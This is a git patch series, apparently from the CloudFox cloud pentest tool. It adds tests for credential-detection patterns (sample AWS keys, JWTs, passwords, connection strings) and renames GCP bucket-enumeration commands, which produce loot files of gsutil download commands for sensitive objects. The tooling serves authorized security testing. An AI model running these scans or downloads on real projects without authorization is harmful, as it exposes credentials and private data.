".git/objects/abc123", + "__pycache__/module.key", + "dist/bundle.env", + } + + for _, fp := range fps { + result := MatchFileName(fp, patterns) + if result != nil { + t.Errorf("expected false positive for %q, got %+v", fp, result) + } + } +} + +func TestMatchFileName_JSONFiltering(t *testing.T) { + patterns := GetFilePatterns() + + // Plain .json should be filtered unless it contains credential keywords + result := MatchFileName("data/report.json", patterns) + if result != nil { + t.Errorf("expected nil for non-credential json, got %+v", result) + } + + // Credential-related .json should match + result = MatchFileName("data/service-account-key.json", patterns) + if result == nil { + t.Errorf("expected match for service account json, got nil") + } +} + +func TestMatchContent(t *testing.T) { + patterns := GetContentPatterns() + + tests := []struct { + name string + input string + wantCount int + category string + }{ + { + "GCP SA key", + `{"type": "service_account", "project_id": "test"}`, + 1, "Credential", + }, + { + "private key", + `-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAK...`, + 1, "Credential", + }, + { + "AWS key", + `access_key = AKIAIOSFODNN7EXAMPLE`, + 1, "Credential", + }, + { + "JWT", + `token=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.abc_def-ghi`, + 1, "Token", + }, + { + "password assignment", + `db_password=SuperSecret123`, + 1, "Secret", + }, + { + "connection string", + `url=postgres://user:pass@host:5432/db`, + 1, "Secret", + }, + { + "no match", + `This is a normal log entry with no sensitive data.`, + 0, "", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + matches := MatchContent(tt.input, patterns) + if len(matches) != tt.wantCount { + t.Errorf("expected %d matches for %q, got %d: %+v", tt.wantCount, tt.name, len(matches), matches) + } + if tt.wantCount > 0 && len(matches) > 0 && matches[0].Category != tt.category { + t.Errorf("expected category %q, got %q", tt.category, matches[0].Category) + } + }) + } +} + +func TestMatchResourceName(t *testing.T) { + patterns := GetNamePatterns() + + tests := []struct { + name string + input string + wantNil bool + category string + }{ + {"password column", "user_password", false, "Credential"}, + {"secret table", "app_secrets", false, "Credential"}, + {"ssn column", "customer_ssn", false, "PII"}, + {"credit card", "credit_card_numbers", false, "PII"}, + {"pii dataset", "raw_pii_data", false, "Compliance"}, + {"payment table", "payment_transactions", false, "Financial"}, + {"normal table", "products", true, ""}, + {"normal column", "created_at", true, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := MatchResourceName(tt.input, patterns) + if tt.wantNil && result != nil { + t.Errorf("expected nil for %q, got %+v", tt.input, result) + } + if !tt.wantNil && result == nil { + t.Errorf("expected match for %q, got nil", tt.input) + } + if !tt.wantNil && result != nil && result.Category != tt.category { + t.Errorf("expected category %q for %q, got %q", tt.category, tt.input, result.Category) + } + }) + } +} + +func TestIsFilePathFalsePositive(t *testing.T) { + p := SensitivePattern{Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL"} + + if !IsFilePathFalsePositive("node_modules/crypto/test.key", p) { + t.Error("expected node_modules to be false positive") + } + if IsFilePathFalsePositive("secrets/server.key", p) { + t.Error("expected secrets/server.key to not be false positive") + } +} + +func TestExtractSnippet(t *testing.T) { + text := "prefix some password=Secret123 suffix text" + snippet := extractSnippet(text, 12, 29, 10) + if len(snippet) == 0 { + t.Error("expected non-empty snippet") + } + // Snippet should contain the match and some context + if len(snippet) > len(text) { + t.Error("snippet should not exceed original text length") + } +} diff --git a/globals/gcp.go b/globals/gcp.go index 01dae47a..6b82599e 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -52,6 +52,10 @@ const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" const GCP_PRIVESC_MODULE_NAME string = "privesc" const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum" +const GCP_LOGENUM_MODULE_NAME string = "log-enum" +const GCP_BIGQUERYENUM_MODULE_NAME string = "bigquery-enum" +const GCP_BIGTABLEENUM_MODULE_NAME string = "bigtable-enum" +const GCP_SPANNERENUM_MODULE_NAME string = "spanner-enum" const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" const GCP_PUBLICACCESS_MODULE_NAME string = "public-access" From a3b7ab4269b56d6de1d1b968d68937d8229f09ad Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 26 Feb 2026 15:01:18 -0500 Subject: [PATCH 47/48] rename buckets -> storage --- README.md | 8 +++- cli/gcp.go | 10 ++--- gcp/commands/bucketenum.go | 84 +++++++++++++++++++------------------- gcp/commands/buckets.go | 38 ++++++++--------- gcp/commands/logenum.go | 42 +++++++++---------- globals/gcp.go | 6 +-- internal/gcp/base.go | 6 +-- 7 files changed, 99 insertions(+), 95 deletions(-) diff --git a/README.md b/README.md index cb66a74d..b6070219 100644 --- a/README.md +++ b/README.md @@ -232,8 +232,8 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [notebooks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#notebooks) | Enumerate Vertex AI Workbench notebooks | | GCP | [workload-identity](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#workload-identity) | Enumerate GKE Workload Identity and Workload Identity Federation | | GCP | [inventory](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#inventory) | Quick resource inventory - works without Cloud Asset API | -| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Enumerate GCP Cloud Storage buckets with security configuration | -| GCP | [bucket-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bucket-enum) | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | [storage](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#storage) | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | [storage-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#storage-enum) | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | | GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Enumerate GCP BigQuery datasets and tables with security analysis | | GCP | [cloudsql](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cloudsql) | Enumerate Cloud SQL instances with security analysis | | GCP | [spanner](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner) | Enumerate Cloud Spanner instances and databases | @@ -270,6 +270,10 @@ For detailed documentation on each GCP command, see the [GCP Commands Wiki](http | GCP | [public-access](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#public-access) | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | | GCP | [cross-project](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#cross-project) | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | | GCP | [foxmapper](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#foxmapper) | Run FoxMapper (graph-based IAM analysis) for privilege escalation path discovery | +| GCP | [logging-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#logging-enum) | Scan Cloud Logging entries for sensitive data (credentials, tokens, PII) | +| GCP | [bigquery-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery-enum) | Scan BigQuery datasets, tables, and columns for sensitive data indicators | +| GCP | [bigtable-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigtable-enum) | Scan Bigtable instances, tables, and column families for sensitive data indicators | +| GCP | [spanner-enum](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#spanner-enum) | Scan Spanner database schemas for sensitive table and column names | diff --git a/cli/gcp.go b/cli/gcp.go index 7bddfdf5..ec7e778e 100755 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -305,8 +305,8 @@ var GCPAllChecksCommand = &cobra.Command{ // Modules excluded from all-checks (run separately, not part of standard enumeration) excludeFromAllChecks := map[string]bool{ "privesc": true, // Already ran above - "bucket-enum": true, // Sensitive data enum modules (run separately) - "log-enum": true, + "storage-enum": true, // Sensitive data enum modules (run separately) + "logging-enum": true, "bigquery-enum": true, "bigtable-enum": true, "spanner-enum": true, @@ -508,7 +508,7 @@ func init() { // Available commands GCPCommands.AddCommand( // Core/existing commands - commands.GCPBucketsCommand, + commands.GCPStorageCommand, commands.GCPArtifactRegistryCommand, commands.GCPBigQueryCommand, commands.GCPSecretsCommand, @@ -574,8 +574,8 @@ func init() { // Pentest/Exploitation commands commands.GCPPrivescCommand, commands.GCPOrgPoliciesCommand, - commands.GCPBucketEnumCommand, - commands.GCPLogEnumCommand, + commands.GCPStorageEnumCommand, + commands.GCPLoggingEnumCommand, commands.GCPBigQueryEnumCommand, commands.GCPBigtableEnumCommand, commands.GCPSpannerEnumCommand, diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index bf490075..7bc9e505 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -20,9 +20,9 @@ var ( maxObjectsWasSet bool // tracks if --max-objects was explicitly set ) -var GCPBucketEnumCommand = &cobra.Command{ - Use: globals.GCP_BUCKETENUM_MODULE_NAME, - Aliases: []string{"bucket-scan", "gcs-enum", "sensitive-files"}, +var GCPStorageEnumCommand = &cobra.Command{ + Use: globals.GCP_STORAGEENUM_MODULE_NAME, + Aliases: []string{"bucket-enum", "bucket-scan", "gcs-enum", "sensitive-files"}, Short: "Enumerate GCS buckets for sensitive files (credentials, secrets, configs)", Long: `Enumerate GCS buckets to find potentially sensitive files. @@ -49,13 +49,13 @@ Flags: By default, only sensitive files are reported with a 1000 object scan limit. WARNING: --all-objects and --no-limit may take a long time for large buckets.`, - Run: runGCPBucketEnumCommand, + Run: runGCPStorageEnumCommand, } func init() { - GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket") - GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Report ALL objects, not just sensitive files (implies --no-limit unless --max-objects is set)") - GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the 1000 object-per-bucket scan limit (still only reports sensitive files)") + GCPStorageEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket") + GCPStorageEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Report ALL objects, not just sensitive files (implies --no-limit unless --max-objects is set)") + GCPStorageEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the 1000 object-per-bucket scan limit (still only reports sensitive files)") } type BucketEnumModule struct { @@ -76,8 +76,8 @@ type BucketEnumOutput struct { func (o BucketEnumOutput) TableFiles() []internal.TableFile { return o.Table } func (o BucketEnumOutput) LootFiles() []internal.LootFile { return o.Loot } -func runGCPBucketEnumCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETENUM_MODULE_NAME) +func runGCPStorageEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGEENUM_MODULE_NAME) if err != nil { return } @@ -114,18 +114,18 @@ func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) } if m.EnumerateAll { - logger.InfoM(fmt.Sprintf("Enumerating ALL bucket contents (%s objects per bucket)...", maxMsg), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Enumerating ALL bucket contents (%s objects per bucket)...", maxMsg), globals.GCP_STORAGEENUM_MODULE_NAME) } else { - logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (%s objects per bucket)...", maxMsg), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (%s objects per bucket)...", maxMsg), globals.GCP_STORAGEENUM_MODULE_NAME) } - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGEENUM_MODULE_NAME, m.processProject) if m.EnumerateAll { // Full enumeration mode allObjects := m.getAllObjects() if len(allObjects) == 0 { - logger.InfoM("No objects found in buckets", globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM("No objects found in buckets", globals.GCP_STORAGEENUM_MODULE_NAME) return } @@ -138,12 +138,12 @@ func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) } logger.SuccessM(fmt.Sprintf("Found %d object(s) across all buckets (%d public)", - len(allObjects), publicCount), globals.GCP_BUCKETENUM_MODULE_NAME) + len(allObjects), publicCount), globals.GCP_STORAGEENUM_MODULE_NAME) } else { // Sensitive files mode allFiles := m.getAllSensitiveFiles() if len(allFiles) == 0 { - logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM("No sensitive files found", globals.GCP_STORAGEENUM_MODULE_NAME) return } @@ -160,7 +160,7 @@ func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) } logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", - len(allFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) + len(allFiles), criticalCount, highCount), globals.GCP_STORAGEENUM_MODULE_NAME) } m.writeOutput(ctx, logger) @@ -184,7 +184,7 @@ func (m *BucketEnumModule) getAllSensitiveFiles() []bucketenumservice.SensitiveF func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_STORAGEENUM_MODULE_NAME) } svc := bucketenumservice.New() @@ -194,17 +194,17 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, if m.LootMap[projectID] == nil { m.LootMap[projectID] = make(map[string]*internal.LootFile) if m.EnumerateAll { - m.LootMap[projectID]["bucket-enum-all-commands"] = &internal.LootFile{ - Name: "bucket-enum-all-commands", + m.LootMap[projectID]["storage-enum-all-commands"] = &internal.LootFile{ + Name: "storage-enum-all-commands", Contents: "# GCS Download Commands for All Objects\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } else { - m.LootMap[projectID]["bucket-enum-sensitive-commands"] = &internal.LootFile{ - Name: "bucket-enum-sensitive-commands", + m.LootMap[projectID]["storage-enum-sensitive-commands"] = &internal.LootFile{ + Name: "storage-enum-sensitive-commands", Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } - m.LootMap[projectID]["bucket-enum-commands"] = &internal.LootFile{ - Name: "bucket-enum-commands", + m.LootMap[projectID]["storage-enum-commands"] = &internal.LootFile{ + Name: "storage-enum-commands", Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -215,13 +215,13 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, buckets, err := svc.GetBucketsList(projectID) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) return } if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_STORAGEENUM_MODULE_NAME) } if m.EnumerateAll { @@ -231,7 +231,7 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, objects, err := svc.EnumerateAllBucketObjects(bucketName, projectID, m.MaxObjects) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, fmt.Sprintf("Could not enumerate bucket %s in project %s", bucketName, projectID)) continue } @@ -245,7 +245,7 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, for _, obj := range projectObjects { if obj.BucketName != currentBucket { currentBucket = obj.BucketName - if lootFile := m.LootMap[projectID]["bucket-enum-all-commands"]; lootFile != nil { + if lootFile := m.LootMap[projectID]["storage-enum-all-commands"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( "# =============================================================================\n"+ "# BUCKET: gs://%s\n"+ @@ -264,7 +264,7 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, m.MaxObjects) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGEENUM_MODULE_NAME, fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) continue } @@ -278,7 +278,7 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, for _, file := range projectFiles { if file.BucketName != currentBucket { currentBucket = file.BucketName - for _, lootName := range []string{"bucket-enum-commands", "bucket-enum-sensitive-commands"} { + for _, lootName := range []string{"storage-enum-commands", "storage-enum-sensitive-commands"} { if lootFile := m.LootMap[projectID][lootName]; lootFile != nil { lootFile.Contents += fmt.Sprintf( "# =============================================================================\n"+ @@ -296,7 +296,7 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, } func (m *BucketEnumModule) addObjectToLoot(projectID string, obj bucketenumservice.ObjectInfo) { - if lootFile := m.LootMap[projectID]["bucket-enum-all-commands"]; lootFile != nil { + if lootFile := m.LootMap[projectID]["storage-enum-all-commands"]; lootFile != nil { publicMarker := "" if obj.IsPublic { publicMarker = " [PUBLIC]" @@ -323,7 +323,7 @@ func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservic localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", file.BucketName, file.ObjectName, localDir) // All files go to the general commands file (without risk ranking) - if lootFile := m.LootMap[projectID]["bucket-enum-commands"]; lootFile != nil { + if lootFile := m.LootMap[projectID]["storage-enum-commands"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( "# %s - gs://%s/%s\n"+ "# %s, Size: %d bytes\n"+ @@ -339,7 +339,7 @@ func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservic // CRITICAL and HIGH risk files also go to the sensitive commands file if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { - if lootFile := m.LootMap[projectID]["bucket-enum-sensitive-commands"]; lootFile != nil { + if lootFile := m.LootMap[projectID]["storage-enum-sensitive-commands"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( "# [%s] %s - gs://%s/%s\n"+ "# Category: %s, Size: %d bytes\n"+ @@ -447,7 +447,7 @@ func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.Ta objects := m.ProjectAllObjects[projectID] if len(objects) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "bucket-enum-all", + Name: "storage-enum-all", Header: m.getAllObjectsHeader(), Body: m.allObjectsToTableBody(objects), }) @@ -457,7 +457,7 @@ func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.Ta files := m.ProjectSensitiveFiles[projectID] if len(files) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "bucket-enum", + Name: "storage-enum", Header: m.getFilesHeader(), Body: m.filesToTableBody(files), }) @@ -465,7 +465,7 @@ func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.Ta sensitiveBody := m.sensitiveFilesToTableBody(files) if len(sensitiveBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "bucket-enum-sensitive", + Name: "storage-enum-sensitive", Header: m.getSensitiveFilesHeader(), Body: sensitiveBody, }) @@ -513,7 +513,7 @@ func (m *BucketEnumModule) writeHierarchicalOutput(ctx context.Context, logger i err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_STORAGEENUM_MODULE_NAME) } } @@ -525,7 +525,7 @@ func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal. allObjects := m.getAllObjects() if len(allObjects) > 0 { tables = append(tables, internal.TableFile{ - Name: "bucket-enum-all", + Name: "storage-enum-all", Header: m.getAllObjectsHeader(), Body: m.allObjectsToTableBody(allObjects), }) @@ -538,7 +538,7 @@ func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal. } } if publicCount > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible object(s)!", publicCount), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible object(s)!", publicCount), globals.GCP_STORAGEENUM_MODULE_NAME) } } } else { @@ -546,7 +546,7 @@ func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal. allFiles := m.getAllSensitiveFiles() if len(allFiles) > 0 { tables = append(tables, internal.TableFile{ - Name: "bucket-enum", + Name: "storage-enum", Header: m.getFilesHeader(), Body: m.filesToTableBody(allFiles), }) @@ -554,11 +554,11 @@ func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal. sensitiveBody := m.sensitiveFilesToTableBody(allFiles) if len(sensitiveBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "bucket-enum-sensitive", + Name: "storage-enum-sensitive", Header: m.getSensitiveFilesHeader(), Body: sensitiveBody, }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_STORAGEENUM_MODULE_NAME) } } } @@ -582,7 +582,7 @@ func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal. err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_STORAGEENUM_MODULE_NAME) } } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index a702d969..d0b0df9f 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -14,9 +14,9 @@ import ( "github.com/spf13/cobra" ) -var GCPBucketsCommand = &cobra.Command{ - Use: globals.GCP_BUCKETS_MODULE_NAME, - Aliases: []string{"storage", "gcs"}, +var GCPStorageCommand = &cobra.Command{ + Use: globals.GCP_STORAGE_MODULE_NAME, + Aliases: []string{"buckets", "gcs"}, Short: "Enumerate GCP Cloud Storage buckets with security configuration", Long: `Enumerate GCP Cloud Storage buckets across projects with security-relevant details. @@ -48,7 +48,7 @@ Security Columns: "X rules" = Number of lifecycle rules configured - Versioning: Object versioning (helps recovery, compliance) - Encryption: "Google-managed" or "CMEK" (customer-managed keys)`, - Run: runGCPBucketsCommand, + Run: runGCPStorageCommand, } // ------------------------------ @@ -78,9 +78,9 @@ func (o BucketsOutput) LootFiles() []internal.LootFile { return o.Loot } // ------------------------------ // Command Entry Point // ------------------------------ -func runGCPBucketsCommand(cmd *cobra.Command, args []string) { +func runGCPStorageCommand(cmd *cobra.Command, args []string) { // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGE_MODULE_NAME) if err != nil { return // Error already logged } @@ -103,16 +103,16 @@ func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { // Try to get FoxMapper cache (preferred - graph-based analysis) m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { - logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_BUCKETS_MODULE_NAME) + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_STORAGE_MODULE_NAME) } // Run enumeration with concurrency - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGE_MODULE_NAME, m.processProject) // Get all buckets for stats allBuckets := m.getAllBuckets() if len(allBuckets) == 0 { - logger.InfoM("No buckets found", globals.GCP_BUCKETS_MODULE_NAME) + logger.InfoM("No buckets found", globals.GCP_STORAGE_MODULE_NAME) return } @@ -125,9 +125,9 @@ func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { } if publicCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(allBuckets), publicCount), globals.GCP_BUCKETS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(allBuckets), publicCount), globals.GCP_STORAGE_MODULE_NAME) } else { - logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(allBuckets)), globals.GCP_BUCKETS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(allBuckets)), globals.GCP_STORAGE_MODULE_NAME) } // Write output @@ -148,7 +148,7 @@ func (m *BucketsModule) getAllBuckets() []CloudStorageService.BucketInfo { // ------------------------------ func (m *BucketsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_STORAGE_MODULE_NAME) } // Create service and fetch buckets @@ -156,7 +156,7 @@ func (m *BucketsModule) processProject(ctx context.Context, projectID string, lo buckets, err := cs.Buckets(projectID) if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETS_MODULE_NAME, + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGE_MODULE_NAME, fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) return } @@ -181,7 +181,7 @@ func (m *BucketsModule) processProject(ctx context.Context, projectID string, lo m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_STORAGE_MODULE_NAME) } } @@ -248,7 +248,7 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) } } if publicCount > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_BUCKETS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_STORAGE_MODULE_NAME) } // Decide between hierarchical and flat output @@ -273,7 +273,7 @@ func (m *BucketsModule) writeHierarchicalOutput(ctx context.Context, logger inte for projectID, buckets := range m.ProjectBuckets { body := m.bucketsToTableBody(buckets) tables := []internal.TableFile{{ - Name: globals.GCP_BUCKETS_MODULE_NAME, + Name: globals.GCP_STORAGE_MODULE_NAME, Header: header, Body: body, }} @@ -304,7 +304,7 @@ func (m *BucketsModule) writeHierarchicalOutput(ctx context.Context, logger inte outputData, ) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_STORAGE_MODULE_NAME) m.CommandCounter.Error++ } } @@ -326,7 +326,7 @@ func (m *BucketsModule) writeFlatOutput(ctx context.Context, logger internal.Log } tableFiles := []internal.TableFile{{ - Name: globals.GCP_BUCKETS_MODULE_NAME, + Name: globals.GCP_STORAGE_MODULE_NAME, Header: header, Body: body, }} @@ -356,7 +356,7 @@ func (m *BucketsModule) writeFlatOutput(ctx context.Context, logger internal.Log output, ) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_STORAGE_MODULE_NAME) m.CommandCounter.Error++ } } diff --git a/gcp/commands/logenum.go b/gcp/commands/logenum.go index 57fb4b4a..ff645138 100644 --- a/gcp/commands/logenum.go +++ b/gcp/commands/logenum.go @@ -19,9 +19,9 @@ var ( logEnumLogName string ) -var GCPLogEnumCommand = &cobra.Command{ - Use: globals.GCP_LOGENUM_MODULE_NAME, - Aliases: []string{"log-scan", "sensitive-logs"}, +var GCPLoggingEnumCommand = &cobra.Command{ + Use: globals.GCP_LOGGINGENUM_MODULE_NAME, + Aliases: []string{"logging-enum", "log-scan", "sensitive-logs"}, Short: "Scan Cloud Logging entries for sensitive data (credentials, tokens, PII)", Long: `Scan Cloud Logging entries for potentially sensitive data. @@ -39,13 +39,13 @@ Flags: --hours Hours of logs to scan (default 168 = 7 days) 